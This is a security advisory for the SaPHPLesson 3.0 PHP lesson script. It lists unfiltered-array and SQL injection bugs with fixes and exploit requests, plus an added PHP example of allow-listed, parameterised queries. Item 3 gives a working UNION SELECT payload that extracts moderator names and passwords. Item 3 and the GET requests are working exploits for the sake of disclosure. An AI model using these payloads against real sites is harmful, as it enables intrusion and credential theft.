SaPHPLesson 3.0 Multiple Bugs
By :-- D3vil-0x1 | Devil-00 --:
1- Unfiltered array
Filename :- show.php
Line :- 102
[code]
$hrow[] = $Row2;
[/code]
Fix :-
Add this code at line [ 11 ] of /show.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$hrow = array();
[/code]
Exploit :-
GET ^
/lessons/show.php?lessid=1&hrow=D3vil-0x1
/---------------------------------------------------------/
2- Unfiltered array
Filename :- showcat.php
Line :- 80
[code]
$Lsnrow[] = $Row;
[/code]
Fix :-
Add this code at line [ 11 ] of /showcat.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$Lsnrow = array();
[/code]
Exploit :-
GET ^
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1
/---------------------------------------------------------/
3- SQL Injection
Filename :- search.php
Line :- Multiple lines
Fix :-
Replace line 28 with :-
[code]
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by
".addslashes($Order)." ".addslashes($Trteb)."";
[/code]
Replace line 32 with :-
[code]
// Category-specific query: $Find is escaped here too, as in the line 28 replacement
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)."
REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and
forums.id=less.forumno order by ".addslashes($Order)."
".addslashes($Trteb)."";
[/code]
Exploit :-
POST ^
Word=a&Find=lesstitle UNION ALL SELECT
null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null
FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC
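Added example (not part of the original advisory and not SaPHPLesson code): addslashes() only escapes quotes, backslashes and NUL bytes, so it does not constrain values placed in the query as unquoted column names or keywords ($Find, $Order, $Trteb); this version takes those from fixed allow-lists and binds $Word and $Cat as parameters. Assumptions: the helper names, the column lists beyond lesstitle and lessid, PDO-style placeholders, and that Cat=All selects the query without a category filter.

```php
<?php
// Added example; not SaPHPLesson code. Table and column names follow the
// queries and request shown in the advisory; everything else is assumed.

const FIND_COLUMNS  = ['lesstitle', 'lessbody'];  // lessbody is hypothetical
const ORDER_COLUMNS = ['lessid', 'lesstitle'];
const DIRECTIONS    = ['DESC', 'ASC'];

// Identifiers and keywords cannot be bound as parameters, so they are only
// ever taken from a fixed list; anything else falls back to the first entry.
function pick(string $value, array $allowed): string
{
    return in_array($value, $allowed, true) ? $value : $allowed[0];
}

// Returns [sql, params] ready for a prepared statement.
function build_search(array $post): array
{
    $find  = pick((string)($post['Find'] ?? ''), FIND_COLUMNS);
    $order = pick((string)($post['Order'] ?? ''), ORDER_COLUMNS);
    $dir   = pick(strtoupper((string)($post['Trteb'] ?? '')), DIRECTIONS);
    $cat   = (string)($post['Cat'] ?? 'All');

    $sql = "select * from less,forums where less.Hidden!=1"
         . " and BINARY less.$find REGEXP ?";
    $params = [(string)($post['Word'] ?? '')];   // values are bound, never spliced
    if ($cat !== 'All') {                        // assumed meaning of Cat=All
        $sql .= " and less.forumno=?";
        $params[] = (int)$cat;
    }
    $sql .= " and forums.id=less.forumno order by $order $dir";
    return [$sql, $params];
}

// Constructed input: a request with SQL appended to Find, as in the advisory.
[$sql, $params] = build_search([
    'Word' => 'a', 'Find' => 'lesstitle UNION ALL SELECT null FROM modretor/*',
    'Cat' => 'All', 'Order' => 'lessid', 'Trteb' => 'DESC',
]);
echo $sql, "\n";   // Find falls back to an allow-listed column name
// With PDO: $stmt = $db->prepare($sql); $stmt->execute($params);
```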
/---------------------------------------------------------/
4- SQL Injection
Filename :- misc.php
Line :- 64
Fix :-
Replace lines 62 & 63 with this code :-
[code]
$LID = intval($_GET["LID"]);
$Rate = intval($_POST["Rate"]);
[/code]
/---------------------------------------------------------/
5- Unfiltered array
Filename :- index.php
Line :- 24
[code]
$rows[] = $Row;
[/code]
Fix :-
Add this code at line [ 11 ] of /index.php :-
We add the code at global scope to fix all the unfiltered variables in the code :)
[code]
$rows = array();
$hrow = array();
[/code]
Exploit :-
GET ^
/saphplesson/index.php?rows=D3vil-x01